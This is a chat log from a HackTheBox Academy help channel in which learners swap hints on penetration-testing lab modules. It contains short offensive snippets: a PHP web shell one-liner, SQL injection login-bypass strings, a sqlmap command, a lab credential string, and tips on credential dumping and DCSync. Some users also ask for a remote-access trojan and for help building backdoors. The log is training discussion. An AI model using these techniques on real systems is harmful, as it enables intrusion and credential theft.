I swear I found creds in || snmp || but its not working

if you got ||tom|| cred openssl should work
I'm also going to predict your next pain point and preemptively tell you to copy paste the thing inside sublime or vs code instead of what you were going to try first that won't work.
This will make sense when you get there
i did try this but i still got my stuff corrupted or something and have to use ||putty|| to fix it
can I get a working bruteforce tool other than burp
umm your pfp is concerning ngl
even if meant ironically
it'd certainly be an instaban on the server I moderate, dunno about here
its a meme
yesh
bruteforcing what?
really depends
Hey can anyone tell me....please..
That can I host CTFs in hackthebox CTF platform for free?
a log in page
umm can i use it for a unknown website?
cause iam working on a website and i wanna have an anti brute force attack in it
Just do timeouts
like fail2ban
too many wrong attempts and just blacklist the IP
also enforce good security policies for password strengths so you or anyone else cant just use a shitty password
does it prevent it? like hydra or burp
so why won't big websites use it? if that is the case
They do
Why does this keep throwing an error for a missing colon, when it is very clearly there
Nobody bruteforces main login pages these days. If they're going to, it's going to be on an obscure forgotten server that isn't set up properly, or it's something like password spraying, where they take one or two really common passwords and try many different users to try to gain access to at least one or two of them
fail2ban and the likes are the common driving force behind this
but what if regular users keep trying passwords they are going to get blocked to
Yup
You can't have your cake and eat it too
you can configure things like fail2ban to be as restrictive or as generous as you'd like
can also mix strategies
imma try to make user add uncommon symbols like @# etc.. in the policy and make at least 8 characters password long
configure fail2ban to target high speed brute attacks, and then use account lockout policies that are more generous, say 10 given attempts within a certain time frame, and have accounts unlock after 24 hours or so. Basically just make it ridiculously slow to brute.
yeah certainly a start
just if you do the account lockout thing, you'd want to whitelist admin accounts and maybe lock down that account with additional security measures so an attacker can't purposely lock out the admin accounts
Hey guys
but why are Facebook accounts getting bruteforced every day
Someone who can help me out with packet inspection, dissecting network traffic with wireshark
so what's the use of hydra then
1. login services haven't always had so many good anti-bruteforce measures and 2. There are other services than just http/websites that can have login mechanisms to brute force.
anyone have safe njrat?
oh thanks for the help fr
oh and 3. Smaller websites that don't think to use something like fail2ban or put in the effort you're putting in tend to be more vulnerable to easy attacks like brute forcing, so hydra still becomes relevant against those targets.
I'm doing Information Gathering now and I can't seem to get the last question to work. I tried using the passive and active methods they taught us in the module but I couldn't get it to work. I also tried to use sublist3r but that didn't work either, it would give me no answer
the question is broken, try using https://subdomainfinder.c99.nl/
Subdomain Finder is a scanner that scans an entire domain to find as many subdomains as possible.
it'll give past scan results that will include the answer
sublist3r worked for me but that was a while back
Yeah sublist3r was the original intended route, but stuff changes
that's twice they have been blocked.
part of the fundamental risk of incorporating real world elements like that. It's nice to have a real world element but it means that the content can become broken at a moment's notice
I would think they would just set up a site specifically for that part of the module.
¯\_(ツ)_/¯
Hey fellow hackers, working in windows fundamentals, got this error message any ideas?
Hello, can I ask for some help?
Stuck at privilege escalation : https://academy.hackthebox.com/module/77/section/844
my progress so far : got to user2, got the flag. Generated ssh key, can't put it to /root/.ssh/authorized_keys (access denied), and despite the fact I left password empty, it still asks for password when I try to ssh using it to either user2 or root at a remote. I'm clearly doing something wrong, but can't figure out what
getting it's indigenous /root/.ssh/id_rsa key also results in nothing since it asks for password for a key anyway (which I obviously do not know)
@woeful oxide try rdesktop
You're not supposed to generate a ssh key to insert at all
ah
seems like I actually forgot last time to use chmod 600 on the extracted rsa key after all
now all works
common mistake
np
hello, I'm having a problem unlocking modules in the Academy! I have enough cubes, but when I press the "unlock" button, nothing happens. The page just seems to move a little bit to the left. I've had the same problem in firefox and chrome on windows, out of a VM. Is this a known issue or am I doing something wrong?
try a hard refresh with ctrl + shift + R if that still doesn't work contact support
i think one of the payload in ||payload all the thing|| work for that or something
Bye
hmm, trying to ssh connect to a host for a module problem, but the connection keeps timing out
damn don't listen to me haha
anyone can help with DNSAdmin section of windows privilege escalation?
anyone available who completed the password attacks module? How do you deal with the backup.vhd file? How do you get a local copy on your machine from smb? tried to access it in both smbclient and a windows vbox using the GUI. All I can do is see the backup.vhd. Not sure what to do from here. Because of the size of the file I can't use normal means of file transfer.
sounds like a problem with your VM. You should be able to just grab it with the "get" command. Have you tried PwnBox?
no I have not, I'll give that a shot.
hey can anyone help me out with the last part of the common applications - skills assesment I?
yes put it on the pwnbox and then if you need to transfer it off i like to use www.ufile.io
having some problems fuzzing
i might be able to help
can I dm you?
yep
Figured it out.
nice work, sorry did not mean to ignore you
No worries. Thank you.
where is that :((
hey. i need help for this question
Enumerate the custom script that is running on the system and submit its output as the answer.
Footprinting
SNMP
@sly grotto what is the problem
what is the meaning of this?
Enumerate the custom script that is running on the system
i mean.how can i do that
Which module are u doing
Footprinting
SNMP
@sly grotto use a word list in seclists and use onesixtyone tool
i did but could not find the answer
@sly grotto what file did u use
snmp-onesixtyone.txt and snmp.txt
managed to find it, I was looking into the wrong group. thanks
When a module says "updated" beside it, does it mean updated since you started/completed the module or does it just show "updated" to everyone?
sql injection fundamentals - skills assessment... I can't find the writable location where I can place my injection... can anybody help?
Hi! I figured out what was happening. It was because of an adblocker (ublock). The moment I turned it off, it worked. Mentioning it in case someone else has this problem in the future
Should be to everyone. For example if you completed a module, and the owner updated it with new text (for example an erratum), it's ok, you don't need to do anything. If it adds an additional task to do, you should see that the module is not completed to 100% anymore
oooft good point, I never even thought about it going from complete to incomplete.. assumed once you've hit "complete" it would stay completed. I was more just thinking if there is new content I wouldn't mind reviewing it, but couldn't remember if the modules said "updated" before I did them xD
I saw that on my Academy profile... Im not sure if it was on a path or on a module... maybe a module
A few modules have been updated, I had to do the updated portion to get the 100% again
Just finished attacking enterprise networks, that was brutal
If you still need help then hint then look at the url
because the vpn does not allow to hear the voices
Isn't academy a sort of school for good and evil? Hahaha
Of course
Hi, I am still confused about HTB, so if I pay for a premium subscription do I get access to everything and cert paths?
Sorry I am still confused about HTB's UI, there is so much going on I am confused lol
I'm running into exactly the same difficulties with the same question, would anyone be willing to share a hint?
Hey, I'm doing the pivoting module and stuck on the skills assessment question 6, I have rdp to the ||172.16.5.35|| box (which has another interface with IP ||172.16.6.35||) and tried scanning from there the ||172.16.6.1-254|| space but found no hosts alive. Noticed that both interfaces in that box have configured as DNS a ||172.16.10.5|| but that address is not reachable, any hints as to where to go from here?
Did you have a look if there are any other users on the machine?
Nvm, a fair bit of googling and I was able to find the answer. If there's a way to do so on the machine, please share.
DM me π
wait nevermind... just read your question more carefully lol
yes its a Google question
i did not care for it
Good to know. Might be worthwhile specifying that it has to be looked up, spent the better part of this afternoon on it.
I know. It kills the momentum of the module imo
yes one more user, nothing on Desktop, Docs or Downloads folder, was able to dump creds, but no other hosts to use
Did you try the cmd ping scan as well to look for hosts?
yep, on few ranges actually and nothing coming up this is what i used
for /L %i in (1 1 254) do ping ||172.16.6.%i|| -n 1 -w 100 | find "Reply"
for that, a sweep doesn't always work for me so I recommend a gui tool called wnetwatcher
trying that now.. lets see if it works
feeling like there is something broken with that lab hahaha, can't find any more hosts
Yea, sounds like a reset is in order. Your previous command was successful for me when I did the module.
I have reset the lab like 5 times now
didn't pick up any other host, but thanks for the tip. the scan is way faster than the ping
did you change the network interface? if you click f9 or go in to the advanced menu or something you find the network interface
no I did not..
found it and another IP came up.. thank you!
damn ping scan
@arctic acorn @vital adder thanks guys
@silver zenith congratulations
Tnx
Hi everyone ! I need help on one of the module
Attacking Common services
FTP
I found the USER J and R, i bruteforced J pwd and modified a file to allow me to ssh into the host as J.
But it seems that I need to do that with R, I tried to bruteforce both SMB and FTP with the normal list and a mutated version of it, but no luck.
Can I have a hint ?
so did you use the wordlist ||found in the ftp server?||
hint: it's way easier than you think
Can I pm you ? I don't want to spoil the others
sure
Hi everyone,
This question is not related to HTB, it is related to THM room. I am extremely curious in the room Avenger Blog at Task 6 (SQLj) as follows
According to the material, it says the SQL query is SELECT * FROM username='[input1]' AND password='[input2]';
→ if I put ' OR 1=1; -- - in username, the SQL query should become SELECT * FROM username='' OR 1=1;
So my question is Why can I only bypass login when injecting both username and password is ' OR 1=1 -- ?
hello everybody
guys i really would like to come to an end with the sql injeciton fundamentals modul...
but i have no idea how to start in the skill assesment...can anybody help me...?
Review the module and follow the steps, treat it like a knowledge check but harder, are you in an admin login? How do pages vulnerable to sqli behave when they receive an input? If it's the case, for what error are you looking or which output do you want to receive? How do you check for DB version with sqli?
If you need more hints dm me
Um I am a beginner
I just started with the fundamentals and i am facing an issue in answering one of interactive questions
the question is about the most likely os flavour and i tried parrot and Parrot and Parrot1 and so on but it still tells me it is the wrong answer
Linux or Windows?
try a hard refresh with ctrl + shift + R or if you have ads block on try turn it off to see if that fix it
Can anyone help me figure this out?
can you use conditions in FROM statement?
yess I did try to use ' OR 1=1; -- - → It should work but it doesn't, you have to use it on both username & password in order to bypass login
i was able to login...but i really have a problem to understand where and when i have to use the ' in the sql injection..
||admin' or '1'='1-- - did not work
admin' or '1'='1'-- - did work... why?||
Hello! Recently this year, I've been wanting to get more into Cyber. So far I'm just going through HTB's academy and I'm still at the start of it, I see for the Setting Up module, Parrot is recommended for the Linux distribution used. At the moment my device is set up with Dual boot between Windows 11 I heavily regret updating that and Linux Mint which I'm still getting used to. Right now I'm wondering for the most part, what makes Parrot better than other distributions for cyber? Should I not spend time on installing all of the tools/packages on my Linux Mint system and be good?
it is recommended to use something like parrot or kali in my opinion, mostly because almost all of the tools and things you will need are pre-installed
hi guys, do you know what is the basis for the recommendation of boxes when you finish a module? I can't find the relationship between the Network enumeration with nmap module and the suggested boxes.
Anyone stuck in the Skills Assessment - WordPress?
I need to identify the version of the wordpress site, but the site seems to not be using wordpress
hint ||wordpress isn't on this domain||
@earnest flame sir !!!! please add this account !!!!! it is very le urgent before I leave
a very unfortunate incident happened
THANKS SIR CYA IN EEV
That's not the domain you're looking for
Thanks a lot
Has anyone passed the bug bounty exam? Any review?
Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com
Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...
Thanks buddy
stuck on this question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."
can anyone push me in the right direction with the following question for AD Skills Assessment II?
Create a user list and then use a technique to spray passwords
No one likes to help someone that spams all caps help repeatedly
in multiple channels no less
Ok im sorry
But there is a virus in my computer
I need help
Maaan
best of luck, try repair shops in your area
I never thought Jesus would be a computer guy
He isn't, that's why he's asking for help lmao
how to send a message every 2 minutes
Why do you want to spam in first place?
Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"
question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"
Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying its incorrect. Am I missing something or is this an error in the module?
So for Linux Fundamentals. I have been stuck on this question for 2 days, and google has provided me with 87 ways to find an incorrect answer. Anyone available to help with what should be a simple problem?
hint that section have a lot of false password just to f with you, you need to find the password and like the hint said it's in C:\Users
sure what's the issue?
I just brute forced it before I went insane but. TLDR: How many Services are Listening on the Target System on all Interfaces. I ran basically every single netstat grep pipe yadda blah blah command I could think of. I found at least 18 different answers but none of those were correct.
I don't understand why the answer was the answer as I never got it as an answer but. It was.
oh yeah I remember this section was hell for me too, but what is the name of this section?
I mean. At least I was on the right track and using the right commands. So. That makes me feel better
Hey guys -- I am working through the AD Enumeration and Attacks course. I am doing the first AD Network after completing the course. I cannot seem to find tpetty's clear text password. I have tried mimikatz on ms01 as well as the web server. I have used powersploit to search in the description field. I have searched through sysvol. I understand I need to get the password to perform a dc-sync attack but man I am lost on where the heck it is?
yeah and in my note i have to filter out ||127.0.0|| for some reason
Yeah I did that, and didnt do it, limited to 4, limited it to 6, included all. did so many different things
I came up with 87, 106, 192, 10, 8. None of which were correct so I was mildly annoyed.
thanks, found it. thought it checked it there before but guess not.
try ||running lazagne from an elevated powershell||
Will do! Here is the funny thing. I found a different path and just got the final flag but still don't have his clear text creds lol
I ended up using mimikatz to launch a powershell window with tpetty's ticket and performed a DC Sync that way on the admin account. If it works, it works!
ah very nice
I had his hash just not his password
i think we are actually covering this in the new Password Attacks sections
Sounds great! I didn't know it was possible to perform a DC Sync attack with only the users hash. Definitely going to document how I did that in my notes!
yea how did you dcsync from inside the powershell?
I'll DM you my notes
hey
i want to start my journey as a programmer
can
you advise me
or anyone
im just beggining
I'm excited as well as confused
where can I learn about crafting backdoors
i am using windows
okay
ah turning off ad blocker worked!
Thank you very much @vital adder
anyone done the Markup box recently?
Hi, is Anyone still working on Windows priv/ escalation further credential theft? I need a little hint on that section. question 1. I got a password from .xml file in dv folder but it seems that the password is hash?
Got it... just use tools
how long to recreate linux
Hello guys
is it me or things changed around here ... like an upgrade
Things changed in the upgrade
Hi - i am on the Module "Getting Started" - Part: "Nibbles - Privilege Escalation".
I successfully started a shell by executing the .php script on the WebServer and got a TTY shell by using Python3 and pty (like it's written in the Module...^^).
But when I try to use the sudo command to execute the modified monitor.sh file, I must enter a password for the user "nibbler", but the LinEnum.sh script said I wouldn't need the password. In the Module Description they didn't need a password either.
Can someone give me a hint to my mistake?
Never mind - seems like you have to give it the full path - and it's not enough to be in the actual directory and just use sudo monitor.sh (seems like I have to read about this later...^^)
Hi guys, need some help with PIVOTING, TUNNELING, AND PORT FORWARDING - Skill Assignment, have rdp into the first Win target and dumped the lsass. Stuck on send the file back to the pwnbox. Tried to forward the pwnbox 445 but no luck...
Re read the values
True :/
which channel to get technical help?
nevermind, needed to change /sec option in xfreerdp to rdp to windows server 2008
an academy within an academy
Hi! I need some tips please. I have access to the user2 directory where the flag.txt file is located, but I can't see the content.
"SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'."
Im doing File Upload Skill assessment, I have bypassed the filter but i cant find the upload directory..
Is anyone able to help? I'm trying to do the XSS Phishing payload.
Does anyone know how I can connect to the FileZilla-Server in the Windows File Transfer Methods section? I have a problem with the login. I tried the username anonymous with no password, but I always get a login incorrect. I guess it's the only way to use FileZilla, because there is no other way to upload a file. So does anyone know the login credentials for the FTP-Server?
can anyone help me with the password attack skills- Medium?
@autumn garnet what is the problem
I got onto the user jason but I can't figure out how to get onto any other users
Can anyone help with Attacking Common Applications SQL?
I'm getting pissed at this module
Windows Privilege Escalation Skills Assessment 1: I've gained a shell as IIS but no matter what I've tried I can't find the ldapadmin password or escalate credentials... any hint?
@autumn garnet did you look for any files or keys for SSH?
In jason I ran ls -al, no .ssh or .bash_history, but I saw in dennis there's .ssh and .bash_history, but I have no idea how to get into dennis
Hi guys, I am struggling on this question of the AD module. The user details provided haven't got the privilege to run a full pass-pols in order to answer this question:
What is the password history size of the domain? (How many passwords remembered.)
Is powershell the bash terminal?
Does someone have hack apps?
hint: you need to privilege escalate into user2 to get the flag
Hack apps ??
hint: you need to read the ||source code||
if you are having issues with the payload, add this at the end instead of the thing they give you: <!--');
Can i dm you ?
I don't fully understand what you mean, and I'm not sure that Windows machine has FTP. Also, they did give you the creds for RDP, so use that
sure
hint: check what is running on the target machine
which section are you on? I don't see anything about SQL injection for this module in my notes
attacking sql databases
with mssql database
do you mean the Attacking Common Services module?
it's not letting me scroll to the bottom of the Windows screen to get at the start button or task bar in the first Windows Fundamentals section
can someone help me with this?
if you need to DM me that's fine
thanks for the tip, I'll enumerate a bit more with that in mind
hi is anyone available to help me?
can you send a screenshot of that?
if you still need help with that shoot me a dm
wtf is that
if you look on the right there's no start button and I can't scroll down to get to start button
in the Windows VDP connection
oh, a small tab thing; just use a normal tab for that
click full view
so do you have issue with question 1 or 2?
hint: you can use the method shown in ||Capture MSSQL Service Hash||
it won't let me click full view
"maximize" is greyed out
Yeah, I tried with Impacket
I used the tab key to get start button but I can't see what is currently selected so I kind of have to guess
lol
inconvenient
I got powershell open
close and open the browser again
ohh I just realized, do you have 2 browser tabs on 2 sides of your screen?
yes
that's why
yes
ok
ok ya when I open it up full screen it fixes it
or something like that
thanks
true, also the paste button
ok thanks
if you don't use the full tab/page you won't see it
anyways I gotta go to a workout. thanks for helping me with this
I will use actual full screen from now on
$ python3 ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -t pass-pols
Result of "pass-pols" command
Default password policy:
[+] |___Minimum password length = 7
[+] |___Password complexity = Disabled
[*] |___Lockout threshold = Disabled
[+] No fine grained password policy found (high privileges are required).
If anyone can help with the Active Directory password length question
So I checked with nmap and only found the SMB service running for TCP, and for UDP I found 137 open but didn't find anything for UDP. I already got the jason login from the zip file in the SMB shares and haven't found any other users with any other files on SMB. I checked what's running on the system with "ps aux" and only found mysql running, but I don't know any databases in mysql.
hint: you are on the right path at ||the end there||; another hint for this part is ||try with what you got||
thank you so much, bro. I got it now. Can I buy you a beer or something?
bro I really need a hint for that
I tried impersonating, xp_subdirs, etc.
and using responder is pointless
I'll change my background on my Kali VM to it for a week
I need a hint/nudge for this module question that I've been stuck on all weekend. I'm tasked with SSHing into a server using provided credentials, finding a way to swap users, and then grabbing the flag.txt. I can log in just fine, but after that, I can't figure out how to proceed. The hint is to review what I've learned in this module, but a chunk of it isn't even applicable here. I tried doing a reverse shell, but the connection keeps timing out when I try to connect back. sudo -l lists NOPASSWD for user2 for /bin/bash as well
Try Ctrl+H
I managed to do that, sorry for bothering
Hey guys, need a clue into the right track on the last question of the SNMP Footprinting, "Enumerate the custom script that is running on the system and submit its output as the answer."
Alright, I'm taking a break from this. I have no idea what I'm missing and feel like I've tried every angle that I can think of/have been shown that is applicable. Will check back a bit later after I've done a mental reset
hint: re-check the stuff under User Privileges. Are you in the Getting Started module, Privilege Escalation section?
you can answer ||all 3 questions|| with the ||given snmpwalk|| command
I am, but swapping to user2 via su -u user2 asks for a password I don't have
Hi, anyone have any hints on how to find the flag with NSE? I've run scans for a few hours now. Not sure what to look for.
Thanks
I saw Jesus Christ in here yesterday and now I saw TaylorSwift typing
Hahaha
if you run sudo -l (I don't remember exactly what command you can run as root without any creds), but it isn't the su command, so you can't use that
which section and module?
Nmap Scripting Engine module 7
the module name not the module url number
also I just tried; URL 7 doesn't point to any module
Network Enumeration with Nmap
sudo -l gives (user2 : user2) NOPASSWD: /bin/bash
yep you can run bash as root without any cred
but I don't understand how that helps me or what I'm supposed to do with this information when it comes to swapping to user2. I checked out gtfobins for bash and nothing there seems like it would be useful, unless I'm missing something
it's lateral movement
user2 may have access to stuff that can be useful that user1 does not
so basically the sudo -u flag is for running a command as another user. In the example they run echo, and in your case you can use the same thing, but you have access to bash so you can just spawn a shell
omfg
alright, ty both
I'm noticing a trend here that overthinking things is very easy to do lmao
@brittle bluff so I just tested some stuff, and even with the right script I still can't get the flag. The first time I did this I was too lazy to use nmap, so I just enumerated by hand and got the flag
read the hint: the flag is in ||the Web servers||
Okay, thanks
oh that's weird, I tried both on my machine and the Pwnbox, and even with the right script I still can't get the flag
thanks! will run the command again and see if I find it
out of curiosity, is there a way to select text in a terminal to copy when you have to scroll to see it all? I managed to do it via zooming out, but am wondering if there's an easier way
so select the first or top part (whichever part you need), don't click anything else, scroll down to the rest of the thing you need, then press Shift and click on the end of the whole thing that you want to select
alright, I'll keep that in mind. Thanks!
LMAO it was right in front of me, thanks!
@vital adder https://academy.hackthebox.com/achievement/433014/153 thanks again for reminding me that I need to sleep, so maybe next time I'll remember all the hints I already had
Maintaining and keeping track of a user's session is an integral part of web applications. It is an area that requires extensive testing to ensure it is set up robustly and securely. This module covers the most common attacks and vulnerabilities that can affect web application sessions, such as Session Hijacking, Session Fixation, Cross-Site Req...
when i figured out the skill assessment it literally built a new circuit in my brain
Hi, I'm stuck in the Footprinting Medium lab, can someone give me a hint? I found the sa user, I tried some logins in MSSQL and RDP, but idk what's next
think ||password reuse||
I tried with other default users but no
what about ||local administrator?||
I tried to execute as admin but no, I'm stuck. I guess I'm missing something but idk what
can someone explain this please?
we should be able to|| RDP as administrator||
Bro say this is a war way a tell you what happened to me if you dead olmost and you have a dream or a don't now am in bed in hospital and a dream 6 people sit aro a tesh with Kaps and black eyes they look to me and then they Comunidad together and a was awake what mean that because the doctors say am gonna to day this happened 2017 we are now 2022 bro]
which module are you on?
Hey guys
Working on the bash scripting module - conditionals
I don't get how to do it, I mean, there's a way to obtain the value without even using the if else statements
Can I dm you?
sure
So Im doing the Pivoting, Tunneling, and Port Forwarding module, on the RDP and SOCKS Tunneling with SocksOverRDP page.
I transferred the SocksOverRDP server and .dll to the first host, but when I try to run regsvr32 on the .dll plugin, it just tells me the module failed to load, and then shortly after the dll is just deleted from the folder??
it registers it as a potential virus, even though AV is turned off
Got the flag by just manually RDPing into each box in order, which kinda defeats the intent of the page/lesson, but it looks like the page is outdated and broken.
|| sqlmap 'http://161.35.32.190:32168/case3.php' --data 'id=1*'|| This one?
Module: Password attacks
Section: Credential Hunting in Linux
Please check the machine; it's really slow.
Hi, anyone have any hints on how to find the flag with NSE? I've run scans for a few hours now. Not sure what to look for. Module NETWORK ENUMERATION WITH NMAP, page 7. I have tried most of the scripts.
Thanks
@brittle bluff use http-enum
I used --script http-enum "IP" and I'm still looking around and can't see the flag
Hey I want to join a room to play CTF in HTB
Want to play CTFs but I don't know how to start
Man, I pasted echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php into my Obsidian markdown file and Windows Defender deletes it because apparently it's a threat
Hello, does anybody know what is the correct answer in academy: Which version of Metasploit is free and can be used only through a CLI? because I tried everything and nothing works ... it should be framework or in long: Metasploit Framework
@sharp temple hey, can you help me?
looool
I guess you need to read the module again
Yes, I did
well, if you can't find that answer, it means you haven't enumerated the module well, as the answer is right there
Start by making an account and a team on the ctf.hackthebox.com platform, then join the hacktheboo ctf. Then you will have access to the challenges
Okay....
what command do you use to run Metasploit?
Btw, now should I create my own team or else join an existing team?
Can I join one of your teams?
Because I am new here
it's a solo event, make your own team.
uff, but this is not the version of Metasploit, it only has Pro and Framework as versions, it is not a well-written question ... but thanks anyway!
Okay .... it's done
yeah I know, I do agree with you, some of the questions are not written up correctly, leading to errors in the answer
Now .... after that, what should I do??
While I try to play it's asking to submit a flag and press enter
@sharp temple what is the problem?
managed to solve this
Hello, I am stuck on the Command Injection first question https://academy.hackthebox.com/module/109/section/1032
Yeah
you need to include the period after the sentence
you mean after the ip or before the ip ?
I looked at the source code but I don't understand it
Hi guys !
I am working through the "Active Directory Enumeration & Attacks" course on Academy. I am stuck at this question:
"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)"
I've tried with PowerSploit but the request keeps running for too long without result, so I am using BloodHound, but the two permissions I see are invalid answers. Can someone who got the answer tell me where I'm wrong, please?
you open the browser and enter an IP and then any injection operator. Right there in the browser it will throw you an error
yes now I got it
I just didn't know the error is the answer .
I guess burnout can really f*** your judgement
it does, sometimes need to take some time off for a little bit
Hi everyone,
Does anyone have a walkthrough of bWAPP bugs at security level medium and high?
Most tutorial series on the net only focus on "low" level, they don't guide "medium" and "high" level.
Hey, can someone DM me? I need some help with the IMAP/POP3 section in the Footprinting module. I don't understand what I should do to find the flag and the admin email address
@rustic sage what is the problem
I'm logged in as the user robin with IMAP, but I'm not sure I understand what to do to get the admin email address
~~File Upload Attacks: Limited File Uploads XXE payload (svg) not working for me.. Tried like the example in the module and also various other formats from payload lists / cheatsheets~~ seemed to work ok when I spawned a new instance
Hey all --
I am working through the second AD network at the end of the "AD Enumeration & Attacks" course and I must be missing something really obvious. I can't even find the hash for the first domain user. Here's what I have done so far:
- I used Kerbrute and jsmith.txt to generate a list of 57 valid users
- Attempted AS-REP Roasting on these users with no success
- Have been running Responder to see if there is any movement on the network but have not been able to get any users or hashes
- Have attempted enum4linux on all of the servers -- including enumeration on the DC
- Have tried to connect to every server's SMB share but get access denied
Does anyone know what I might be missing? Thanks!
what am i doing wrong? how is it not 2.4.29?
????????????
i can't find any "above server" other than inlanefreight.com
@loud dagger write
Heyyy
@loud dagger don't copy and paste just write the answer
yeah that's what i've been doing
2.4.29
Can someone help me with 'Introduction to Networking'?
@loud dagger logout and try again
didn't work
@loud dagger use whatweb to see what results you will get
Hi everyone, I am in a module using Wb - Burp Intruder proxy servers. I'm trying to answer the question "use Burp Intruder to search for '.html' files in the /admin directory". I managed to find the directory "admin 200 OK". Can anyone explain what to do next? And how to find the flag?
i still get 2.4.29
i don't think the target i want is inlanefreight but i can't figure out what else i'm supposed to target
Ok
Which module is that?
I'm on mobile rn but I think it was Introduction to Web Requests
Someone can help me on the Footprinting - Medium Lab? I can connect the NFS share but I don't have permission to see the files. I guess I tried to create the ||nobody|| user that the folder seems to belong to, but I can't change to the user to access the folder. The lesson is too vague about that part that I could make any sense of it.
How can I get access to the NFS share?
Are you sure you're curling the right server? It looks like your target is down from the picture. Also I just attempted the exercise and I got a different (albeit similar) answer
You need to click on the "click here to spawn target system!"
That will give you an IP and port, where the web server for this exercise is located. You need to do this target spawning for every exercise
Hi guys, I need some help with File Upload Attacks - Whitelist Filters. I managed to upload a file (||execshell.php/.jpg||), but I can't seem to find it, or execute commands. From the page source code I see something got uploaded ||img src='/profile_images/.jpg'||, and when I browse there I just see my shell's code, but I can't run commands.
I have tried various permutations of ||http://IP:PORT/execshell.php|| but got nothing.
OHHHH
THANK YOU
Mmm
You crafted that shell or it's a shell from a repo?
I'm in the password attack module, attacks on Protected Archives. I downloaded the Zip file on my machine, but when it comes to getting the password, John is not able to. Any ideas?
I got some trouble using more sophisticated shells so I went back to using the basic one
Crafted, kind of. I generated it using a script from the lesson
I am using <?php system($_REQUEST['cmd']); ?> as my shell if that's what you mean. Problem is I can't find where the file gets uploaded
ooh i see
let me check my notes
@echo zenith use the mutated list
no
@echo zenith why
???
I don't know, I'll try, but it didn't occur to me, I imagined it would be with rockyou
@echo zenith it is not rockyou, use the mutated list which you had to make while brute forcing the password
having some issues with "ATTACKING WEB APPLICATIONS WITH FFUF - Skills Assessment - Web Fuzzing" maybe someone could help a brotha out
trying to fuzz extensions on 4 subdomains and can't get through the whole thing in the amount of time it gives you on the box
found two obvious ones
I might be over thinking this....
Hey guys, in Active Directory Enumeration and Attacks, Skills Assessment I, I can't get the clear creds for the user.. I already know the user, but to get the password I tried mimikatz and LaZagne and just can't (with elevated priv).. any hint is appreciated